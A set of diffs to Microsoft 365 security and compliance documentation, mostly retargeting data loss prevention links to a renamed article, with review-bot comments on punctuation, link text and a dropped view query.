- M365-security-compliance - m365initiative-defender-office365 description: "Learn about remediation actions following automated investigation in Microsoft Defender for Office 365." Previously updated : 02/09/2021 Last updated : 04/30/2021 - air ms.technology: mdo
Microsoft Defender for Office 365 includes remediation actions to address variou
|User|A user is sending malware/phish|Automated investigation does not result in a specific pending action. <p> The user might be reporting malware/phish, or someone could be [spoofing the user](anti-spoofing-protection.md) as part of an attack. Use [Threat Explorer](threat-explorer.md) to view and handle email containing [malware](threat-explorer-views.md#email--malware) or [phish](threat-explorer-views.md#email--phish).| |User|Email forwarding <br> (Mailbox forwarding rules are configured, which could be used for data exfiltrationΓÇï.)|Remove forwarding ruleΓÇï <p> Use [mail flow insights](mail-flow-insights-v2.md), including the [Autoforwarded messages report](mfi-auto-forwarded-messages-report.md), to view more specific details about forwarded email.| |User|Email delegation rulesΓÇï <br> (A user's account has delegation set up.)|Remove delegation ruleΓÇï <p> If your organization is using [Microsoft Defender for Endpoint](/windows/security/threat-protection/), consider [investigating the user](/microsoft-365/security/defender-endpoint/investigate-user) who's getting the delegation permission.ΓÇï|
-|User|Data exfiltration <br> (A user violated email or file-sharing [DLP policies](../../compliance/data-loss-prevention-policies.md).)|Automated investigation does not result in a specific pending action. <p> [View DLP reports and take action](../../compliance/view-the-dlp-reports.md).|
+|User|Data exfiltration <br> (A user violated email or file-sharing [DLP policies](../../compliance/dlp-learn-about-dlp.md) |Automated investigation does not result in a specific pending action. <p> [View DLP reports and take action](../../compliance/view-the-dlp-reports.md).|
|User|Anomalous email sending <br> (A user recently sent more email than during the previous 7-10 days.)|Automated investigation does not result in a specific pending action. <p> Sending a large volume of email isn't malicious by itself; the user might just have sent email to a large group of recipients for an event. To investigate, use [mail flow insights](mail-flow-insights-v2.md), including the [mail flow map report](mfi-mail-flow-map-report.md) to determine what's going on and take action.| ## Next steps
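Review bot: In the changed "Data exfiltration" row, the link retarget also dropped the closing ".)" of the parenthetical, leaving "(A user violated email or file-sharing [DLP policies](../../compliance/dlp-learn-about-dlp.md) |" with an unbalanced parenthesis and a stray space before the cell delimiter. Restore the ".)" after the link so the cell matches the other rows, such as "(A user's account has delegation set up.)".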
security Air View Investigation Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-view-investigation-results.md
The investigation status indicates the progress of the analysis and actions. As
|**Starting**|The investigation has been triggered and waiting to start runningΓÇï.| |**Running**|The investigation process has started and is underway. This state also occurs when [pending actions](air-review-approve-pending-completed-actions.md#approve-or-reject-pending-actions) are approved.| |**No Threats Found**|The investigation has finished and no threats (user account, email message, URL, or file) were identified. <p> **TIP**: If you suspect something was missed (such as a false negative), you can take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
-|**Threats Found**|The automated investigation found issues, but there are no specific remediation actions to resolve those issues. <p> The **Threats Found** status can occur when some type of user activity was identified but no cleanup actions are available. Examples include any of the following user activities: <br/>- A [data loss prevention](../../compliance/data-loss-prevention-policies.md) (DLP) event<br/>- An email sending anomaly<br/>- Sent malware<br/>- Sent phish <p> The investigation found no malicious URLs, files, or email messages to remediate, and no mailbox activity to fix, such as turning off forwarding rules or delegation. <p> **TIP**: If you suspect something was missed (such as a false negative), you can investigate and take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
+|**Threats Found**|The automated investigation found issues, but there are no specific remediation actions to resolve those issues. <p> The **Threats Found** status can occur when some type of user activity was identified but no cleanup actions are available. Examples include any of the following user activities: <br/>- A [data loss prevention](../../compliance/dlp-learn-about-dlp.md) event<br/>- An email sending anomaly<br/>- Sent malware<br/>- Sent phish <p> The investigation found no malicious URLs, files, or email messages to remediate, and no mailbox activity to fix, such as turning off forwarding rules or delegation. <p> **TIP**: If you suspect something was missed (such as a false negative), you can investigate and take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
|**Terminated By System**|The investigation stopped. An investigation can stop for several reasons:ΓÇï <br/>- The investigation's pending actions expired. Pending actions time out after awaiting approval for one week.<br/>- There are too many actions. For example, if there are too many users clicking on malicious URLs, it can exceed the investigation's ability to run all the analyzers, so the investigation haltsΓÇï.<p> **TIP**: If an investigation halts before actions were taken, try using [Threat Explorer](threat-explorer.md) to find and address threats.| |**Pending Action**|The investigation has found a threat, such as a malicious email, a malicious URL, or a risky mailbox settingΓÇï, and an action to remediate that threat is [awaiting approval](air-review-approve-pending-completed-actions.md). <p> The **Pending Action** state is triggered when any threat with a corresponding action is found. However, the list of pending actions can increase as an investigation runs. View investigation details to see if other items are still pending completion.ΓÇï| |**Remediated**|The investigation finished and all remediation actions were approved (noted as fully remediated). <p> **NOTE**: Approved remediation actions can have errors that prevent the actions from being taken. Regardless of whether remediation actions are successfully completed, the investigation status does not change. View investigation details.ΓÇï|
solutions Best Practices Anonymous Sharing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/best-practices-anonymous-sharing.md
To set the default file and folder sharing link for a specific site
## Prevent unauthenticated sharing of sensitive content
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) to prevent unauthenticated sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label, retention label, or sensitive information in the file itself.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) to prevent unauthenticated sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label, retention label, or sensitive information in the file itself.
To create a DLP rule 1. In the Microsoft 365 compliance admin center, go to the [Data loss prevention page](https://compliance.microsoft.com/datalossprevention).
solutions Configure Teams Baseline Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/configure-teams-baseline-protection.md
Microsoft 365 offers additional methods for securing your content. Consider if t
- Have guests agree to a [terms of use](/azure/active-directory/conditional-access/terms-of-use). - Configure a [session timeout policy](/azure/active-directory/conditional-access/howto-conditional-access-session-lifetime) for guests.-- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/data-loss-prevention-policies.md) to set policies around accessing sensitive information.
+- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/dlp-learn-about-dlp.md) to set policies around accessing sensitive information.
## See Also
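Review bot: The retargeted link keeps the link text "data loss protection", while the destination is `dlp-learn-about-dlp.md` and every other page in this change set calls the feature "data loss prevention". Since this line is being edited anyway, correct the link text to "data loss prevention" so readers searching for the DLP feature find it under its real name.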
solutions Create Secure Guest Sharing Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/create-secure-guest-sharing-environment.md
With the policy in place, when a user types "Project Saturn" into a document, th
## Create a DLP policy to remove guest access to highly sensitive files
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) to prevent unwanted guest sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label and remove guest access.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) to prevent unwanted guest sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label and remove guest access.
To create a DLP rule
solutions Deploy Threat Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/deploy-threat-protection.md
Title: Deploy threat protection capabilities across Microsoft 365 description: Get an overview of threat protection services and security capabilities in Microsoft 365 E5. Protect your user accounts, devices, email content, and more with Microsoft 365 E5.
-keywords: solution, setup, advanced threat protection, atp, security, microsoft 365 E5, protect devices, defender, m365
+keywords: microsoft threat protection, setup, advanced threat protection, security, microsoft 365 E5, protect devices, microsoft defender
solutions Financial Services Secure Collaboration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/financial-services-secure-collaboration.md
In addition, Microsoft provides "trainable classifiers" that use machine-learnin
Applying sensitivity labels to documents and emails embeds metadata that identifies the chosen sensitivity within the object. The sensitivity then travels with the data. So even if a labeled document is stored on a user's desktop or within an on-premises system, it's still protected. This functionality enables other Microsoft 365 solutions, such as Microsoft Cloud App Security or network edge devices, to identify sensitive data and automatically enforce security controls. Sensitivity labels have the added benefit of educating employees about which data within an organization is considered sensitive and how to handle that data when they receive it.
-**[Office 365 Data Loss Prevention (DLP)](../compliance/data-loss-prevention-policies.md?view=o365-worldwide)** automatically identifies documents, emails, and conversations that contain sensitive data by scanning them for sensitive data and then enforcing policy on those objects. Policies are enforced on documents in SharePoint and OneDrive for Business. They're also enforced when users send email, and in Teams chats and channel conversations. Policies can be configured to look for keywords, sensitive data types, retention labels, and whether data is shared within the organization or externally. Controls are provided to help organizations fine-tune DLP policies to reduce false positives. When sensitive data is found, customizable policy tips can be displayed to users within Microsoft 365 applications to inform them that their content contains sensitive data and then propose corrective actions. Policies can also prevent users from accessing documents, sharing documents, or sending emails that contain certain types of sensitive data. Microsoft 365 supports more than 100 built-in sensitive data types. Organizations can configure custom sensitive data types to meet their policies.
+**[Office 365 Data Loss Prevention (DLP)](../compliance/dlp-learn-about-dlp.md)** automatically identifies documents, emails, and conversations that contain sensitive data by scanning them for sensitive data and then enforcing policy on those objects. Policies are enforced on documents in SharePoint and OneDrive for Business. They're also enforced when users send email, and in Teams chats and channel conversations. Policies can be configured to look for keywords, sensitive data types, retention labels, and whether data is shared within the organization or externally. Controls are provided to help organizations fine-tune DLP policies to reduce false positives. When sensitive data is found, customizable policy tips can be displayed to users within Microsoft 365 applications to inform them that their content contains sensitive data and then propose corrective actions. Policies can also prevent users from accessing documents, sharing documents, or sending emails that contain certain types of sensitive data. Microsoft 365 supports more than 100 built-in sensitive data types. Organizations can configure custom sensitive data types to meet their policies.
Rolling out MIP and DLP policies to organizations requires careful planning and a user education program so that employees understand the organization's data classification schema and which types of data are considered sensitive. Providing employees with tools and educational programs that help them identify sensitive data and understand how to handle it makes them part of the solution for mitigating information security risks.
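Review bot: the replacement link in the DLP paragraph drops the `?view=o365-worldwide` query that the old target `data-loss-prevention-policies.md?view=o365-worldwide` carried, and nothing in the visible lines says whether that is intentional. If the paragraph is meant to resolve to the worldwide view regardless of the reader's current moniker, keep the query on `dlp-learn-about-dlp.md`; otherwise say in the commit description that the pin was removed on purpose. The other retargeted links in this set had no query, so this is the only one where behaviour can change beyond the file rename.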
solutions Groups Teams Compliance Governance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/groups-teams-compliance-governance.md
The following table provides a quick reference for the compliance controls avail
||Automatically classify sensitive content|[Apply a sensitivity label to content automatically](../compliance/apply-sensitivity-label-automatically.md)| ||Encrypt sensitive content|[Restrict access to content by using sensitivity labels to apply encryption](../compliance/encryption-sensitivity-labels.md)| |Information protection|||
-||Prevent the loss of sensitive information|[Overview of data loss prevention](../compliance/data-loss-prevention-policies.md)|
+||Prevent the loss of sensitive information|[Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md)|
||Protect sensitive information in chat.|[Data loss prevention and Microsoft Teams](../compliance/dlp-microsoft-teams.md)| ||Define your organization's sensitive information|[Custom sensitive information types](../compliance/sensitive-information-type-learn-about.md)| |User segmentation|||
Additional resources:
DLP policies can prevent the accidental sharing of sensitive information across SharePoint, Exchange, and Teams. You can create policies that specify actions to take (such as blocking access) based on a set of rules. -- [Overview of data loss prevention](../compliance/data-loss-prevention-policies.md)
+- [Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md)
DLP in Teams can help protect sensitive information in Teams chat and channel messages by deleting messages that contain sensitive information.
solutions Information Protection Deploy Protect Information https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/information-protection-deploy-protect-information.md
For data privacy within sites of concern, push sensitivity labels for automatic
## Data loss prevention
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) in Microsoft 365 to detect, warn, and block risky, inadvertent, or inappropriate sharing, such as sharing of data containing personal information, both internally and externally.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) in Microsoft 365 to detect, warn, and block risky, inadvertent, or inappropriate sharing, such as sharing of data containing personal information, both internally and externally.
DLP allows you to:
solutions Secure Teams Security Isolation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/secure-teams-security-isolation.md
Microsoft 365 offers additional methods for securing your content. Consider if t
- Have your guests agree to a [terms of use](/azure/active-directory/conditional-access/terms-of-use). - Configure a [session timeout policy](/azure/active-directory/conditional-access/howto-conditional-access-session-lifetime) for guests.-- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/data-loss-prevention-policies.md) to set policies around accessing sensitive information.
+- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/dlp-learn-about-dlp.md) to set policies around accessing sensitive information.
- Use [Azure Active Directory access](/azure/active-directory/governance/access-reviews-overview) reviews to periodically review team access and membership. ## Drive user adoption for team members
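Review bot: the link text on the changed bullet still reads "data loss protection" although it now points at `dlp-learn-about-dlp.md`, and every other link retargeted in this set names the feature "data loss prevention". Since the line is being touched anyway, change the link text to "data loss prevention" so the bullet matches the article it links to and the product term used in the rest of the docs.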